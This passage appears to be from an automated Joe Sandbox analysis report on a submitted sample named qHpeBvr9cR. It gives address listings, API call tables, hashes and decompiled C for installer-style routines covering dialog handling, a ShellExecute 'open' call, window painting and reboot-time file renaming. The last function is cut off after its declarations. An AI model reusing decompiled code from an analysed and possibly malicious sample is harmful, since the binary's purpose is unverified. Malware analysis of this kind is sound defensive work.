                                              0x00403d4e
                                              0x00403d53
                                              0x00403d56
                                              0x00403d5c
                                              0x00403d61
                                              0x00403d64
                                              0x00403d6a
                                              0x00403d72
                                              0x00403d78
                                              0x00403d7e
                                              0x00403d82
                                              0x00403d89
                                              0x00403d89
                                              0x00403d89
                                              0x00403d93
                                              0x00403da5
                                              0x00403db1
                                              0x00403db6
                                              0x00403dc0
                                              0x00403dc6
                                              0x00403dc8
                                              0x00403dcd
                                              0x00403dca
                                              0x00403dca
                                              0x00403dca
                                              0x00403ddd
                                              0x00403df5
                                              0x00403df7
                                              0x00403dfd
                                              0x00403e12
                                              0x00403dff
                                              0x00403e08
                                              0x00403e0a
                                              0x00403e0a
                                              0x00403e18
                                              0x00403e28
                                              0x00403e39
                                              0x00403e40
                                              0x00403e46
                                              0x00403e4a
                                              0x00403e4f
                                              0x00403e51
                                              0x00000000
                                              0x00403e57
                                              0x00403e57
                                              0x00403e59
                                              0x00000000
                                              0x00000000
                                              0x00403e5f
                                              0x00403e63
                                              0x00403e88
                                              0x00403e8e
                                              0x00403e94
                                              0x00403e96
                                              0x00000000
                                              0x00000000
                                              0x00403ebc
                                              0x00403ec2
                                              0x00403ec4
                                              0x00403ec9
                                              0x00000000
                                              0x00000000
                                              0x00403ecf
                                              0x00403ed2
                                              0x00403ed5
                                              0x00403eec
                                              0x00403ef8
                                              0x00403f11
                                              0x00403f17
                                              0x00403f1b
                                              0x00403f20
                                              0x00403f26
                                              0x00000000
                                              0x00000000
                                              0x00403f30
                                              0x00403f3b
                                              0x00000000
                                              0x00403f3b
                                              0x00403e65
                                              0x00403e6b
                                              0x00000000
                                              0x00000000
                                              0x00403e71
                                              0x00403e77
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403e7d
                                              0x00403e51
                                              0x00403f48
                                              0x00403f54
                                              0x00403f5b
                                              0x00000000
                                              0x00403cac
                                              0x00403cac
                                              0x00403caf
                                              0x00403ce2
                                              0x00403ce2
                                              0x00403ce4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403ce4
                                              0x00403cb1
                                              0x00403cb5
                                              0x00403cba
                                              0x00403cbc
                                              0x00000000
                                              0x00000000
                                              0x00403ccc
                                              0x00403cd4
                                              0x00000000
                                              0x00403cda
                                              0x00403b08
                                              0x00403b08
                                              0x00403b0c
                                              0x00403b11
                                              0x00403b20
                                              0x00403b20
                                              0x00403b29
                                              0x00403b32
                                              0x00403b3d
                                              0x00403b3d
                                              0x00403b49
                                              0x00403b65
                                              0x00403b68
                                              0x00403b7b
                                              0x00403b81
                                              0x00403c24
                                              0x00000000
                                              0x00403c2d
                                              0x00403b87
                                              0x00403b94
                                              0x00403b96
                                              0x00403b98
                                              0x00403bb7
                                              0x00403bb7
                                              0x00403bba
                                              0x00403bbf
                                              0x00403bc2
                                              0x00403bd2
                                              0x00403bd3
                                              0x00403bd5
                                              0x00403c0b
                                              0x00403c1e
                                              0x00000000
                                              0x00403c1e
                                              0x00403bd7
                                              0x00403bdd
                                              0x00403bf6
                                              0x00403bfb
                                              0x00403bfd
                                              0x00000000
                                              0x00000000
                                              0x00403bff
                                              0x00403beb
                                              0x00403beb
                                              0x00403bed
                                              0x00403bed
                                              0x00000000
                                              0x00403bed
                                              0x00403be0
                                              0x00403be5
                                              0x00000000
                                              0x00403be5
                                              0x00403bc4
                                              0x00403bca
                                              0x00000000
                                              0x00000000
                                              0x00403bcc
                                              0x00000000
                                              0x00403bcc
                                              0x00403bbc
                                              0x00000000
                                              0x00403bbc
                                              0x00403ba2
                                              0x00403ba9
                                              0x00403baf
                                              0x00403bb1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403bb1
                                              0x00403b6d
                                              0x00000000
                                              0x00403b4b
                                              0x00403b51
                                              0x00403b5b
                                              0x00403f61
                                              0x00403f61
                                              0x00403f67
                                              0x00403f74
                                              0x00403f7a
                                              0x00403f7a
                                              0x00403f84
                                              0x00000000
                                              0x00403f84
                                              0x00403b49

                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                              • ShowWindow.USER32(?), ref: 00403B3D
                                              • DestroyWindow.USER32 ref: 00403B51
                                              • SetWindowLongA.USER32 ref: 00403B6D
                                              • GetDlgItem.USER32 ref: 00403B8E
                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                              • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                              • GetDlgItem.USER32 ref: 00403C57
                                              • GetDlgItem.USER32 ref: 00403C61
                                              • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                              • GetDlgItem.USER32 ref: 00403D72
                                              • ShowWindow.USER32(00000000,?), ref: 00403D93
                                              • EnableWindow.USER32(?,?), ref: 00403DA5
                                              • EnableWindow.USER32(?,?), ref: 00403DC0
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                              • EnableMenuItem.USER32 ref: 00403DDD
                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                              • lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
                                              • SetWindowTextA.USER32(?,00420580), ref: 00403E40
                                              • ShowWindow.USER32(?,0000000A), ref: 00403F74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                              • String ID:
                                              • API String ID: 184305955-0
                                              • Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                              • Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
                                              • Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                              • Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004040FF Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420560 =  *0x420560 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040401E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422f20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd50 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040438A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42375c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040CB;
				E00403FB7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FB7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403FEC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f90 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f544 =  *0x41f544 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420560 =  *0x420560 & 0x00000000;
				return 0;
			}

















                                              0x0040410f
                                              0x00404235
                                              0x00404291
                                              0x00404295
                                              0x0040436c
                                              0x0040436e
                                              0x0040436e
                                              0x00404374
                                              0x00404374
                                              0x00404377
                                              0x00000000
                                              0x0040437e
                                              0x004042a3
                                              0x004042a5
                                              0x004042af
                                              0x004042ba
                                              0x004042bd
                                              0x004042c0
                                              0x004042cb
                                              0x004042ce
                                              0x004042d5
                                              0x004042e3
                                              0x004042fb
                                              0x00404303
                                              0x0040430e
                                              0x0040431e
                                              0x00404320
                                              0x00404320
                                              0x004042d5
                                              0x0040432a
                                              0x00000000
                                              0x00404335
                                              0x00404339
                                              0x0040434a
                                              0x0040434a
                                              0x00404350
                                              0x0040435e
                                              0x0040435e
                                              0x00000000
                                              0x00404362
                                              0x0040432a
                                              0x00404240
                                              0x00000000
                                              0x00404254
                                              0x0040425a
                                              0x00404260
                                              0x00000000
                                              0x00000000
                                              0x00404285
                                              0x00404287
                                              0x0040428c
                                              0x00000000
                                              0x0040428c
                                              0x00404240
                                              0x00404115
                                              0x00404118
                                              0x0040411d
                                              0x0040412e
                                              0x0040412e
                                              0x00404135
                                              0x00404138
                                              0x0040413a
                                              0x0040413f
                                              0x00404148
                                              0x0040414e
                                              0x0040415a
                                              0x0040415d
                                              0x00404166
                                              0x0040416b
                                              0x0040416e
                                              0x00404173
                                              0x0040418a
                                              0x00404191
                                              0x004041a4
                                              0x004041a7
                                              0x004041bc
                                              0x004041c3
                                              0x004041c8
                                              0x004041cd
                                              0x004041cd
                                              0x004041dc
                                              0x004041eb
                                              0x004041ed
                                              0x00404203
                                              0x00404212
                                              0x00404214
                                              0x00000000

                                              APIs
                                              • CheckDlgButton.USER32 ref: 0040418A
                                              • GetDlgItem.USER32 ref: 0040419E
                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041BC
                                              • GetSysColor.USER32(?), ref: 004041CD
                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041DC
                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041EB
                                              • lstrlenA.KERNEL32(?), ref: 004041F5
                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404203
                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404212
                                              • GetDlgItem.USER32 ref: 00404275
                                              • SendMessageA.USER32(00000000), ref: 00404278
                                              • GetDlgItem.USER32 ref: 004042A3
                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042E3
                                              • LoadCursorA.USER32 ref: 004042F2
                                              • SetCursor.USER32(00000000), ref: 004042FB
                                              • ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
                                              • LoadCursorA.USER32 ref: 0040431B
                                              • SetCursor.USER32(00000000), ref: 0040431E
                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040434A
                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040435E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                              • String ID: /B$N$open
                                              • API String ID: 3615053054-636633259
                                              • Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                              • Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
                                              • Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                              • Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f90;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                              0x0040100a
                                              0x00401039
                                              0x00401047
                                              0x0040104d
                                              0x00401051
                                              0x0040105b
                                              0x00401061
                                              0x00401064
                                              0x004010f3
                                              0x00401089
                                              0x0040108c
                                              0x004010a6
                                              0x004010bd
                                              0x004010cc
                                              0x004010cf
                                              0x004010d5
                                              0x004010d9
                                              0x004010e4
                                              0x004010ed
                                              0x004010ef
                                              0x004010ef
                                              0x00401100
                                              0x00401105
                                              0x0040110d
                                              0x00401110
                                              0x00401112
                                              0x00401118
                                              0x0040111f
                                              0x00401126
                                              0x00401130
                                              0x00401142
                                              0x00401156
                                              0x00401160
                                              0x00401165
                                              0x00401165
                                              0x00401110
                                              0x0040116e
                                              0x00000000
                                              0x00401178
                                              0x00401010
                                              0x00401013
                                              0x00401015
                                              0x0040101f
                                              0x0040101f
                                              0x00000000

                                              APIs
                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32 ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32 ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                              • Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
                                              • Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                              • Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405A49 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E00405A49(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00406087(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x424010 =  *0x424010 + 1;
						return _t20;
					}
				}
				 *0x422710 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
						_t56 = _t55 + 0x10;
						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
						_t20 = E004059D2(0x422188, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405947(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405947(_t26 + 0xa, 0x409424);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405993(_t51 + _t29, 0x421d88, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405CFB(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059D2(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                              0x00405a4f
                                              0x00405a56
                                              0x00405a5a
                                              0x00405a63
                                              0x00405a67
                                              0x00405ba6
                                              0x00405ba6
                                              0x00000000
                                              0x00405ba6
                                              0x00405a67
                                              0x00405a73
                                              0x00405a89
                                              0x00405ab1
                                              0x00405abc
                                              0x00405ac0
                                              0x00405ae0
                                              0x00405ae7
                                              0x00405af1
                                              0x00405afe
                                              0x00405b03
                                              0x00405b08
                                              0x00405b0c
                                              0x00000000
                                              0x00000000
                                              0x00405b1b
                                              0x00405b1d
                                              0x00405b2a
                                              0x00405b2e
                                              0x00405b9f
                                              0x00405ba0
                                              0x00000000
                                              0x00405b4a
                                              0x00405b57
                                              0x00405bbc
                                              0x00405bc3
                                              0x00405b6a
                                              0x00405b6a
                                              0x00405b6c
                                              0x00405b75
                                              0x00405b80
                                              0x00405b92
                                              0x00405b99
                                              0x00000000
                                              0x00405b99
                                              0x00405bc5
                                              0x00405bc6
                                              0x00405bcb
                                              0x00405bcd
                                              0x00405bda
                                              0x00405bda
                                              0x00405bde
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405bcf
                                              0x00405bcf
                                              0x00405bd2
                                              0x00405bd5
                                              0x00405bd6
                                              0x00000000
                                              0x00405bcf
                                              0x00405b62
                                              0x00405b67
                                              0x00000000
                                              0x00405b67
                                              0x00405b2e
                                              0x00405a8b
                                              0x00405a96
                                              0x00405a9f
                                              0x00405aa3
                                              0x00000000
                                              0x00000000
                                              0x00405aa3
                                              0x00405bb0

                                              APIs
                                                • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
                                              • GetShortPathNameA.KERNEL32 ref: 00405A9F
                                              • GetShortPathNameA.KERNEL32 ref: 00405ABC
                                              • wsprintfA.USER32 ref: 00405ADA
                                              • GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
                                              • GlobalFree.KERNEL32 ref: 00405B99
                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0
                                                • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                              • String ID: %s=%s$[Rename]
                                              • API String ID: 3445103937-1727408572
                                              • Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                              • Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
                                              • Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                              • Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405D1D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
